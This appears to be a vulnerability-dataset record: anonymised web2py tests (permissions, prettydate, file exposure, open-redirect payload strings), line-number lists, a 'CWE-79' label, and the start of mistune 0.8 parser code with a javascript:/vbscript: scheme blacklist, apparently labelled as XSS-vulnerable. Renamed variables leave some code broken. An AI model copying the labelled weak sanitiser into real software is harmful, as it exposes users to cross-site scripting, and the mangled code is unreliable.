VAR_49 = \
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_50 = \
self.db(self.db.auth_permission.id == VAR_49).count()
self.assertTrue(VAR_50)
VAR_50 = \
self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
(self.db.auth_permission.name == 'no_permission') &
(self.db.auth_permission.table_name == 'no_table') &
(self.db.auth_permission.record_id == 0)).count()
self.assertFalse(VAR_50)
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_49 = \
self.auth.add_permission(VAR_38=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
VAR_51 = \
self.db(self.db.auth_permission.id == VAR_49).select(self.db.auth_permission.name).first().name
self.assertEqual(VAR_51, 'user_1_permission')
VAR_49 =\
self.auth.add_permission(VAR_38=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(VAR_49)
def FUNC_41(self):
VAR_49 = \
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,
)
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.del_permission(VAR_38=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,))
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_50 = \
self.db(self.db.auth_permission.id == VAR_49).count()
self.assertFalse(VAR_50)
class CLASS_3(unittest.TestCase):
def FUNC_42(self):
VAR_52 = datetime.datetime.now()
self.assertEqual(prettydate(VAR_78=VAR_52), 'now')
VAR_53 = VAR_52 - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(VAR_78=VAR_53), '1 second ago')
VAR_54 = VAR_52 - datetime.timedelta(seconds=2)
self.assertEqual(prettydate(VAR_78=VAR_54), '2 seconds ago')
VAR_55 = VAR_52 - datetime.timedelta(seconds=60)
self.assertEqual(prettydate(VAR_78=VAR_55), '1 minute ago')
VAR_56 = VAR_52 - datetime.timedelta(seconds=61)
self.assertEqual(prettydate(VAR_78=VAR_56), '1 minute ago')
VAR_57 = VAR_52 - datetime.timedelta(seconds=120)
self.assertEqual(prettydate(VAR_78=VAR_57), '2 minutes ago')
VAR_58 = VAR_52 - datetime.timedelta(seconds=121)
self.assertEqual(prettydate(VAR_78=VAR_58), '2 minutes ago')
VAR_59 = VAR_52 - datetime.timedelta(seconds=60 * 60)
self.assertEqual(prettydate(VAR_78=VAR_59), '1 hour ago')
VAR_60 = VAR_52 - datetime.timedelta(seconds=3601)
self.assertEqual(prettydate(VAR_78=VAR_60), '1 hour ago')
VAR_61 = VAR_52 - datetime.timedelta(seconds=2 * 60 * 60)
self.assertEqual(prettydate(VAR_78=VAR_61), '2 hours ago')
VAR_62 = VAR_52 - datetime.timedelta(seconds=2 * 60 * 60 + 1)
self.assertEqual(prettydate(VAR_78=VAR_62), '2 hours ago')
VAR_63 = VAR_52 - datetime.timedelta(days=1)
self.assertEqual(prettydate(VAR_78=VAR_63), '1 day ago')
VAR_64 = VAR_52 - datetime.timedelta(days=2)
self.assertEqual(prettydate(VAR_78=VAR_64), '2 days ago')
VAR_65 = VAR_52 - datetime.timedelta(days=7)
self.assertEqual(prettydate(VAR_78=VAR_65), '1 week ago')
VAR_66 = VAR_52 - datetime.timedelta(days=8)
self.assertEqual(prettydate(VAR_78=VAR_66), '1 week ago')
VAR_67 = VAR_52 - datetime.timedelta(days=14)
self.assertEqual(prettydate(VAR_78=VAR_67), '2 weeks ago')
VAR_68 = VAR_52 - datetime.timedelta(days=15)
self.assertEqual(prettydate(VAR_78=VAR_68), '2 weeks ago')
VAR_69 = VAR_52 - datetime.timedelta(days=21)
self.assertEqual(prettydate(VAR_78=VAR_69), '3 weeks ago')
VAR_70 = VAR_52 - datetime.timedelta(days=27)
self.assertEqual(prettydate(VAR_78=VAR_70), '1 month ago')
VAR_71 = VAR_52 - datetime.timedelta(days=28)
self.assertEqual(prettydate(VAR_78=VAR_71), '1 month ago')
VAR_72 = VAR_52 - datetime.timedelta(days=60)
self.assertEqual(prettydate(VAR_78=VAR_72), '2 months ago')
VAR_73 = VAR_52 - datetime.timedelta(days=90)
self.assertEqual(prettydate(VAR_78=VAR_73), '3 months ago')
VAR_74 = VAR_52 - datetime.timedelta(days=365)
self.assertEqual(prettydate(VAR_78=VAR_74), '1 year ago')
VAR_75 = VAR_52 - datetime.timedelta(days=366)
self.assertEqual(prettydate(VAR_78=VAR_75), '1 year ago')
VAR_76 = VAR_52 - datetime.timedelta(days=2 * 365)
self.assertEqual(prettydate(VAR_78=VAR_76), '2 years ago')
VAR_77 = VAR_52 - datetime.timedelta(days=2 * 365 + 1)
self.assertEqual(prettydate(VAR_78=VAR_77), '2 years ago')
VAR_78 = VAR_52.date()
self.assertEqual(prettydate(VAR_78=d), 'now')
VAR_63 = VAR_52.date() - datetime.timedelta(days=1)
self.assertEqual(prettydate(VAR_78=VAR_63), '1 day ago')
VAR_79 = VAR_52.date() - datetime.timedelta(days=2)
self.assertEqual(prettydate(VAR_78=VAR_79), '2 days ago')
VAR_80 = VAR_52 - datetime.timedelta(seconds=-65)
self.assertEqual(prettydate(VAR_78=VAR_80), '1 minute from now')
VAR_81 = VAR_52 - datetime.timedelta(hours=-23.5)
self.assertEqual(prettydate(VAR_78=VAR_81), '23 hours from now')
VAR_82 = VAR_52 - datetime.timedelta(days=-366)
self.assertEqual(prettydate(VAR_78=VAR_82), '1 year from now')
VAR_52 = datetime.datetime.utcnow()
self.assertEqual(prettydate(VAR_78=VAR_52, utc=True), 'now')
VAR_53 = VAR_52 - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(VAR_78=VAR_53, utc=True), '1 second ago')
self.assertEqual(prettydate(VAR_78=None), '')
self.assertEqual(prettydate(VAR_78='invalid_date'), '[invalid date]')
VAR_2 = os.path.join
def FUNC_0():
return os.name == 'posix'
class CLASS_4(unittest.TestCase):
def FUNC_43(self):
VAR_83 = [
('/foo/bar', '/foo'),
('/foo', '/foo'),
('/foo', '/'),
('/', '/'),
]
for sub, VAR_5 in VAR_83:
self.assertTrue(Expose._Expose__in_base(subdir=sub, basedir=VAR_5, sep='/'),
'%s is not under %s' % (sub, VAR_5))
def FUNC_44(self):
VAR_84 = [
('/foobar', '/foo'),
('/foo', '/foo/bar'),
('/bar', '/foo'),
('/foo/bar', '/bar'),
('/', '/x'),
]
for sub, VAR_5 in VAR_84:
self.assertFalse(Expose._Expose__in_base(subdir=sub, basedir=VAR_5, sep='/'),
'%s should not be under %s' % (sub, VAR_5))
class CLASS_5(unittest.TestCase):
def FUNC_1(self):
self.base_dir = tempfile.mkdtemp()
self.make_dirs()
self.touch_files()
self.make_readme()
if FUNC_0():
self.make_symlinks()
self.set_expectations()
tools.URL = lambda VAR_3: URL(VAR_8='a', c='c', f='f', VAR_3=args)
def FUNC_2(self):
tools.URL = URL
shutil.rmtree(self.base_dir)
def FUNC_45(self):
for VAR_78 in (['inside'],
['inside', 'dir1'],
['inside', 'dir2'],
['outside']):
os.mkdir(VAR_2(self.base_dir, *VAR_78))
def FUNC_46(self):
for f in (['inside', 'dir1', 'file1'],
['inside', 'dir1', 'file2'],
['outside', 'file3']):
with open(VAR_2(self.base_dir, *f), 'a'):
pass
def FUNC_47(self):
with open(VAR_2(self.base_dir, 'inside', 'README'), 'w') as f:
f.write('README content')
def FUNC_48(self):
os.symlink(
VAR_2(self.base_dir, 'inside', 'dir1'),
VAR_2(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
os.symlink(
VAR_2(self.base_dir, 'inside', 'dir1', 'file1'),
VAR_2(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
os.symlink(
VAR_2(self.base_dir, 'outside'),
VAR_2(self.base_dir, 'inside', 'link_to_outside'))
os.symlink(
VAR_2(self.base_dir, 'outside', 'file3'),
VAR_2(self.base_dir, 'inside', 'link_to_file3'))
def FUNC_49(self):
VAR_85 = lambda VAR_3: URL('a', 'c', 'f', VAR_3=args)
self.expected_folders = {}
self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
TR(TD(A('dir1', _href=VAR_85(VAR_3=['dir1'])))),
TR(TD(A('dir2', _href=VAR_85(VAR_3=['dir2'])))),
_class='table',
))
self.expected_folders[VAR_2('inside', 'dir1')] = ''
if FUNC_0():
self.expected_folders[VAR_2('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
TR(TD(A('link_to_dir1', _href=VAR_85(VAR_3=['dir2', 'link_to_dir1'])))),
_class='table',
))
else:
self.expected_folders[VAR_2('inside', 'dir2')] = ''
self.expected_files = {}
self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
TR(TD(A('README', _href=VAR_85(VAR_3=['README']))), TD('')),
_class='table',
))
self.expected_files[VAR_2('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
TR(TD(A('file1', _href=VAR_85(VAR_3=['dir1', 'file1']))), TD('')),
TR(TD(A('file2', _href=VAR_85(VAR_3=['dir1', 'file2']))), TD('')),
_class='table',
))
if FUNC_0():
self.expected_files[VAR_2('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
TR(TD(A('link_to_file1', _href=VAR_85(VAR_3=['dir2', 'link_to_file1']))), TD('')),
_class='table',
))
else:
self.expected_files[VAR_2('inside', 'dir2')] = ''
def FUNC_50(self, VAR_5, VAR_6='', VAR_7=False):
current.request = Request(env={})
current.request.raw_args = VAR_6
current.request.args = VAR_6.split('/')
return Expose(VAR_5=VAR_2(self.base_dir, VAR_5),
basename=VAR_5,
VAR_7=follow_symlink_out)
def FUNC_51(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='')
self.assertEqual(VAR_86.args, [])
self.assertEqual(VAR_86.folders, ['dir1', 'dir2'])
self.assertEqual(VAR_86.filenames, ['README'])
@unittest.skipUnless(FUNC_0(), 'requires symlinks')
def FUNC_52(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='',
VAR_7=True)
self.assertEqual(VAR_86.args, [])
self.assertEqual(VAR_86.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(VAR_86.filenames, ['README', 'link_to_file3'])
def FUNC_53(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='dir1')
self.assertEqual(VAR_86.args, ['dir1'])
self.assertEqual(VAR_86.folders, [])
self.assertEqual(VAR_86.filenames, ['file1', 'file2'])
def FUNC_54(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='dir2')
self.assertEqual(VAR_86.args, ['dir2'])
if FUNC_0():
self.assertEqual(VAR_86.folders, ['link_to_dir1'])
self.assertEqual(VAR_86.filenames, ['link_to_file1'])
else:
self.assertEqual(VAR_86.folders, [])
self.assertEqual(VAR_86.filenames, [])
def FUNC_55(self):
VAR_86 = self.make_expose(VAR_5='', VAR_6='inside')
self.assertEqual(VAR_86.args, ['inside'])
if FUNC_0():
self.assertEqual(VAR_86.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(VAR_86.filenames, ['README', 'link_to_file3'])
else:
self.assertEqual(VAR_86.folders, ['dir1', 'dir2'])
self.assertEqual(VAR_86.filenames, ['README'])
def FUNC_56(self):
VAR_86 = self.make_expose(VAR_5='', VAR_6='inside/dir2')
self.assertEqual(VAR_86.args, ['inside', 'dir2'])
if FUNC_0():
self.assertEqual(VAR_86.folders, ['link_to_dir1'])
self.assertEqual(VAR_86.filenames, ['link_to_file1'])
else:
self.assertEqual(VAR_86.folders, [])
self.assertEqual(VAR_86.filenames, [])
def FUNC_57(self, VAR_8, VAR_9):
self.assertEqual(VAR_8 if isinstance(VAR_8, str) else VAR_8.xml(),
VAR_9 if isinstance(VAR_9, str) else VAR_9.xml())
def FUNC_58(self, VAR_5, VAR_6):
VAR_86 = self.make_expose(VAR_5, VAR_6)
VAR_87 = VAR_2(VAR_5, VAR_6).rstrip(os.path.sep)
VAR_88 = Request(env={})
self.assertSameXML(VAR_86.table_files(), self.expected_files[VAR_87])
self.assertSameXML(VAR_86.table_folders(), self.expected_folders[VAR_87])
def FUNC_59(self):
self.run_test_xml_for(VAR_5='inside', VAR_6='')
def FUNC_60(self):
self.run_test_xml_for(VAR_5='inside', VAR_6='dir1')
def FUNC_61(self):
self.run_test_xml_for(VAR_5='inside', VAR_6='dir2')
def FUNC_62(self):
with self.assertRaises(HTTP):
self.make_expose(VAR_5='inside', VAR_6='dir1/file_not_found')
def FUNC_30(self):
with self.assertRaises(HTTP):
self.make_expose(VAR_5='inside', VAR_6='link_to_file3')
class CLASS_6(unittest.TestCase):
def FUNC_63(self):
VAR_89 = [
"/",
"//",
"~/",
"//example.com",
"/\example.com"
"~/example.com"
"//example.com/VAR_8/VAR_9/c",
"//example.com/VAR_8/VAR_9/c",
"~/example.com/VAR_8/VAR_9/c"
]
VAR_90 = [
"a/VAR_9/c",
"/a",
"/VAR_8/b",
"/VAR_8/VAR_9/c",
]
VAR_91 = ["", ":", "http:", "https:", "ftp:"]
for prefix in VAR_91:
for VAR_85 in VAR_89:
self.assertEqual(prevent_open_redirect(prefix + VAR_85), None)
for prefix in VAR_91:
for VAR_85 in VAR_90:
self.assertEqual(prevent_open_redirect(prefix + VAR_85), prefix + VAR_85)
| [
1,
2,
3,
14,
16,
27,
29,
30,
35,
37,
43,
50,
54,
59,
65,
71,
74,
77,
80,
83,
89,
93,
100,
109,
117,
120,
129,
134,
141,
146,
159,
167,
171,
179,
183,
197,
201,
209,
210,
211,
215,
217,
225,
235,
246,
256,
261,
262,
264,
265,
266,
267,
268,
269,
270,
271,
272,
273,
274,
275,
276,
277,
278,
279,
280,
281,
282,
283,
284,
285,
286,
287,
288,
289,
290,
291,
292,
293,
294,
295,
296,
297,
298,
299,
300,
301,
302,
303,
304,
305,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
332,
333,
334,
335,
336,
337,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367,
368,
369,
370,
371,
372,
373,
374,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
408,
409,
410,
411,
412,
413,
414,
415,
416,
417,
418,
419,
420,
421,
422,
423,
424,
425,
426,
427,
428,
429,
430,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
481,
482,
484,
489,
513,
514,
515,
516,
517,
518,
519,
520,
521,
522,
523,
524,
525,
526,
527,
528,
529,
530,
531,
532,
538,
552,
553,
558,
561,
563,
570,
573,
577,
578,
579,
580,
583,
584,
585,
586,
587,
591,
602,
614,
629,
630,
634,
639,
642,
648,
652,
653,
654,
655,
656,
661,
663,
664,
665,
666,
667,
668,
669,
670,
671,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
682,
684,
686,
688,
692,
695,
700,
701,
702,
703,
704,
705,
706,
707,
713,
714,
715,
721,
722,
723,
724,
726,
728,
729,
730,
731,
732,
738,
739,
740,
741,
742,
743,
744,
749,
754,
755,
756,
757,
758,
760,
771,
780,
781,
786,
787,
788,
789,
792,
795,
803,
804,
806,
807,
810,
812,
813,
815,
819,
820,
821,
826,
832,
835,
836,
837,
838,
839,
840,
841,
842,
843,
844,
845,
849,
853,
856,
858,
861,
862,
869,
871,
874,
883,
888,
895,
900,
905,
914,
916,
921,
926,
927,
932,
933,
940,
945,
953,
955,
960,
964,
968,
977,
983,
989,
999,
1001,
1005,
1012,
1023,
1031,
1045,
1047,
1051,
1052,
1053,
1054,
1055,
1056,
1057,
1058,
1059,
1060,
1061,
1062,
1063,
1064,
1065,
1066,
1067,
1068,
1069,
1070,
1071,
1072,
1073,
1074,
1080,
1133,
1140,
1141,
1148,
1153,
1156,
1157,
1159,
1160,
1163,
1164,
1166,
1169,
1178,
1181,
1191,
1192,
1194,
1197,
1203,
1204,
1205,
1206,
1207,
1208,
1209,
1210,
1211,
1212,
1213,
1214,
1215,
1216,
1217,
1220,
1224,
1232,
1240,
1244,
1247,
1254,
1261,
1264,
1279,
1297,
1305,
1311,
1319,
1325,
1335,
1345,
1355,
1359,
1366,
1369,
1372,
1375,
1379,
1383,
4,
5,
6,
32,
33,
34,
1076,
1077,
1078,
52,
53,
54,
55,
56,
1226,
1234,
1246
] | [
1,
2,
3,
14,
16,
27,
29,
30,
35,
37,
43,
50,
54,
59,
65,
71,
74,
77,
80,
83,
89,
93,
100,
109,
117,
120,
129,
134,
141,
146,
159,
167,
171,
179,
183,
197,
201,
209,
210,
211,
215,
217,
225,
235,
246,
256,
261,
262,
264,
265,
266,
267,
268,
269,
270,
271,
272,
273,
274,
275,
276,
277,
278,
279,
280,
281,
282,
283,
284,
285,
286,
287,
288,
289,
290,
291,
292,
293,
294,
295,
296,
297,
298,
299,
300,
301,
302,
303,
304,
305,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
332,
333,
334,
335,
336,
337,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367,
368,
369,
370,
371,
372,
373,
374,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
408,
409,
410,
411,
412,
413,
414,
415,
416,
417,
418,
419,
420,
421,
422,
423,
424,
425,
426,
427,
428,
429,
430,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
481,
482,
484,
489,
513,
514,
515,
516,
517,
518,
519,
520,
521,
522,
523,
524,
525,
526,
527,
528,
529,
530,
531,
532,
538,
552,
553,
558,
561,
563,
570,
573,
577,
578,
579,
580,
583,
584,
585,
586,
587,
591,
602,
614,
629,
630,
634,
639,
642,
648,
652,
653,
654,
655,
656,
661,
663,
664,
665,
666,
667,
668,
669,
670,
671,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
682,
684,
686,
688,
692,
695,
700,
701,
702,
703,
704,
705,
706,
707,
713,
714,
715,
721,
722,
723,
724,
726,
728,
729,
730,
731,
732,
738,
739,
740,
741,
742,
743,
744,
749,
754,
755,
756,
757,
758,
760,
771,
780,
781,
786,
787,
788,
789,
792,
795,
803,
804,
806,
807,
810,
812,
813,
815,
819,
820,
821,
826,
832,
835,
836,
837,
838,
839,
840,
841,
842,
843,
844,
845,
849,
853,
856,
858,
861,
862,
869,
871,
874,
883,
888,
895,
900,
905,
914,
916,
921,
926,
927,
932,
933,
940,
945,
953,
955,
960,
964,
968,
977,
983,
989,
999,
1001,
1005,
1012,
1023,
1031,
1045,
1047,
1051,
1052,
1053,
1054,
1055,
1056,
1057,
1058,
1059,
1060,
1061,
1062,
1063,
1064,
1065,
1066,
1067,
1068,
1069,
1070,
1071,
1072,
1073,
1074,
1080,
1133,
1140,
1141,
1148,
1153,
1156,
1157,
1159,
1160,
1163,
1164,
1166,
1169,
1178,
1181,
1191,
1192,
1194,
1197,
1203,
1204,
1205,
1206,
1207,
1208,
1209,
1210,
1211,
1212,
1213,
1214,
1215,
1216,
1217,
1220,
1224,
1232,
1240,
1244,
1247,
1254,
1261,
1264,
1279,
1297,
1305,
1311,
1319,
1325,
1335,
1345,
1355,
1359,
1366,
1369,
1372,
1375,
1379,
1383,
1384,
1386,
1412,
1413,
1414,
1415,
4,
5,
6,
32,
33,
34,
1076,
1077,
1078,
52,
53,
54,
55,
56,
1226,
1234,
1246
] |
1CWE-79
| # coding: utf-8
"""
mistune
~~~~~~~
The fastest markdown parser in pure Python with renderer feature.
:copyright: (c) 2014 - 2017 by Hsiaoming Yang.
"""
import re
import inspect
__version__ = '0.8'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
'BlockGrammar', 'BlockLexer',
'InlineGrammar', 'InlineLexer',
'Renderer', 'Markdown',
'markdown', 'escape',
]
_key_pattern = re.compile(r'\s+')
_nonalpha_pattern = re.compile(r'\W')
_escape_pattern = re.compile(r'&(?!#?\w+;)')
_newline_pattern = re.compile(r'\r\n|\r')
_block_quote_leading_pattern = re.compile(r'^ *> ?', flags=re.M)
_block_code_leading_pattern = re.compile(r'^ {4}', re.M)
_inline_tags = [
'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
'img', 'font',
]
_pre_tags = ['pre', 'script', 'style']
_valid_end = r'(?!:/|[^\w\s@]*@)\b'
_valid_attr = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
_block_tag = r'(?!(?:%s)\b)\w+%s' % ('|'.join(_inline_tags), _valid_end)
_scheme_blacklist = ('javascript:', 'vbscript:')
def _pure_pattern(regex):
pattern = regex.pattern
if pattern.startswith('^'):
pattern = pattern[1:]
return pattern
def _keyify(key):
return _key_pattern.sub(' ', key.lower())
def escape(text, quote=False, smart_amp=True):
"""Replace special characters "&", "<" and ">" to HTML-safe sequences.
The original cgi.escape will always escape "&", but you can control
this one for a smart escape amp.
:param quote: if set to True, " and ' will be escaped.
:param smart_amp: if set to False, & will always be escaped.
"""
if smart_amp:
text = _escape_pattern.sub('&', text)
else:
text = text.replace('&', '&')
text = text.replace('<', '<')
text = text.replace('>', '>')
if quote:
text = text.replace('"', '"')
text = text.replace("'", ''')
return text
def escape_link(url):
"""Remove dangerous URL schemes like javascript: and escape afterwards."""
lower_url = url.lower().strip('\x00\x1a \n\r\t')
for scheme in _scheme_blacklist:
if re.sub(r'[^A-Za-z0-9\/:]+', '', lower_url).startswith(scheme):
return ''
return escape(url, quote=True, smart_amp=False)
def preprocessing(text, tab=4):
text = _newline_pattern.sub('\n', text)
text = text.expandtabs(tab)
text = text.replace('\u2424', '\n')
pattern = re.compile(r'^ +$', re.M)
return pattern.sub('', text)
class BlockGrammar(object):
"""Grammars for block level tokens."""
def_links = re.compile(
r'^ *\[([^^\]]+)\]: *' # [key]:
r'<?([^\s>]+)>?' # <link> or link
r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
)
def_footnotes = re.compile(
r'^\[\^([^\]]+)\]: *('
r'[^\n]*(?:\n+|$)' # [^key]:
r'(?: {1,}[^\n]*(?:\n+|$))*'
r')'
)
newline = re.compile(r'^\n+')
block_code = re.compile(r'^( {4}[^\n]+\n*)+')
fences = re.compile(
r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```lang
r'([\s\S]+?)\s*'
r'\1 *(?:\n+|$)' # ```
)
hrule = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
heading = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
lheading = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
block_quote = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
list_block = re.compile(
r'^( *)([*+-]|\d+\.) [\s\S]+?'
r'(?:'
r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # hrule
r'|\n+(?=%s)' # def links
r'|\n+(?=%s)' # def footnotes
r'|\n{2,}'
r'(?! )'
r'(?!\1(?:[*+-]|\d+\.) )\n*'
r'|'
r'\s*$)' % (
_pure_pattern(def_links),
_pure_pattern(def_footnotes),
)
)
list_item = re.compile(
r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
flags=re.M
)
list_bullet = re.compile(r'^ *(?:[*+-]|\d+\.) +')
paragraph = re.compile(
r'^((?:[^\n]+\n?(?!'
r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
r'))+)\n*' % (
_pure_pattern(fences).replace(r'\1', r'\2'),
_pure_pattern(list_block).replace(r'\1', r'\3'),
_pure_pattern(hrule),
_pure_pattern(heading),
_pure_pattern(lheading),
_pure_pattern(block_quote),
_pure_pattern(def_links),
_pure_pattern(def_footnotes),
'<' + _block_tag,
)
)
block_html = re.compile(
r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
r'<!--[\s\S]*?-->',
r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (_block_tag, _valid_attr),
r'<%s(?:%s)*?\s*\/?>' % (_block_tag, _valid_attr),
)
)
table = re.compile(
r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
)
nptable = re.compile(
r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
)
text = re.compile(r'^[^\n]+')
class BlockLexer(object):
"""Block level lexer for block grammars."""
grammar_class = BlockGrammar
default_rules = [
'newline', 'hrule', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'block_quote',
'list_block', 'block_html', 'def_links',
'def_footnotes', 'table', 'paragraph', 'text'
]
list_rules = (
'newline', 'block_code', 'fences', 'lheading', 'hrule',
'block_quote', 'list_block', 'block_html', 'text',
)
footnote_rules = (
'newline', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'hrule', 'block_quote',
'list_block', 'block_html', 'table', 'paragraph', 'text'
)
def __init__(self, rules=None, **kwargs):
self.tokens = []
self.def_links = {}
self.def_footnotes = {}
if not rules:
rules = self.grammar_class()
self.rules = rules
def __call__(self, text, rules=None):
return self.parse(text, rules)
def parse(self, text, rules=None):
text = text.rstrip('\n')
if not rules:
rules = self.default_rules
def manipulate(text):
for key in rules:
rule = getattr(self.rules, key)
m = rule.match(text)
if not m:
continue
getattr(self, 'parse_%s' % key)(m)
return m
return False # pragma: no cover
while text:
m = manipulate(text)
if m is not False:
text = text[len(m.group(0)):]
continue
if text: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % text)
return self.tokens
def parse_newline(self, m):
length = len(m.group(0))
if length > 1:
self.tokens.append({'type': 'newline'})
def parse_block_code(self, m):
# clean leading whitespace
code = _block_code_leading_pattern.sub('', m.group(0))
self.tokens.append({
'type': 'code',
'lang': None,
'text': code,
})
def parse_fences(self, m):
self.tokens.append({
'type': 'code',
'lang': m.group(2),
'text': m.group(3),
})
def parse_heading(self, m):
self.tokens.append({
'type': 'heading',
'level': len(m.group(1)),
'text': m.group(2),
})
def parse_lheading(self, m):
"""Parse setext heading."""
self.tokens.append({
'type': 'heading',
'level': 1 if m.group(2) == '=' else 2,
'text': m.group(1),
})
def parse_hrule(self, m):
self.tokens.append({'type': 'hrule'})
def parse_list_block(self, m):
bull = m.group(2)
self.tokens.append({
'type': 'list_start',
'ordered': '.' in bull,
})
cap = m.group(0)
self._process_list_item(cap, bull)
self.tokens.append({'type': 'list_end'})
def _process_list_item(self, cap, bull):
cap = self.rules.list_item.findall(cap)
_next = False
length = len(cap)
for i in range(length):
item = cap[i][0]
# remove the bullet
space = len(item)
item = self.rules.list_bullet.sub('', item)
# outdent
if '\n ' in item:
space = space - len(item)
pattern = re.compile(r'^ {1,%d}' % space, flags=re.M)
item = pattern.sub('', item)
# determine whether item is loose or not
loose = _next
if not loose and re.search(r'\n\n(?!\s*$)', item):
loose = True
rest = len(item)
if i != length - 1 and rest:
_next = item[rest-1] == '\n'
if not loose:
loose = _next
if loose:
t = 'loose_item_start'
else:
t = 'list_item_start'
self.tokens.append({'type': t})
# recurse
self.parse(item, self.list_rules)
self.tokens.append({'type': 'list_item_end'})
def parse_block_quote(self, m):
self.tokens.append({'type': 'block_quote_start'})
# clean leading >
cap = _block_quote_leading_pattern.sub('', m.group(0))
self.parse(cap)
self.tokens.append({'type': 'block_quote_end'})
def parse_def_links(self, m):
key = _keyify(m.group(1))
self.def_links[key] = {
'link': m.group(2),
'title': m.group(3),
}
def parse_def_footnotes(self, m):
key = _keyify(m.group(1))
if key in self.def_footnotes:
# footnote is already defined
return
self.def_footnotes[key] = 0
self.tokens.append({
'type': 'footnote_start',
'key': key,
})
text = m.group(2)
if '\n' in text:
lines = text.split('\n')
whitespace = None
for line in lines[1:]:
space = len(line) - len(line.lstrip())
if space and (not whitespace or space < whitespace):
whitespace = space
newlines = [lines[0]]
for line in lines[1:]:
newlines.append(line[whitespace:])
text = '\n'.join(newlines)
self.parse(text, self.footnote_rules)
self.tokens.append({
'type': 'footnote_end',
'key': key,
})
def parse_table(self, m):
item = self._process_table(m)
cells = re.sub(r'(?: *\| *)?\n$', '', m.group(3))
cells = cells.split('\n')
for i, v in enumerate(cells):
v = re.sub(r'^ *\| *| *\| *$', '', v)
cells[i] = re.split(r' *\| *', v)
item['cells'] = cells
self.tokens.append(item)
def parse_nptable(self, m):
item = self._process_table(m)
cells = re.sub(r'\n$', '', m.group(3))
cells = cells.split('\n')
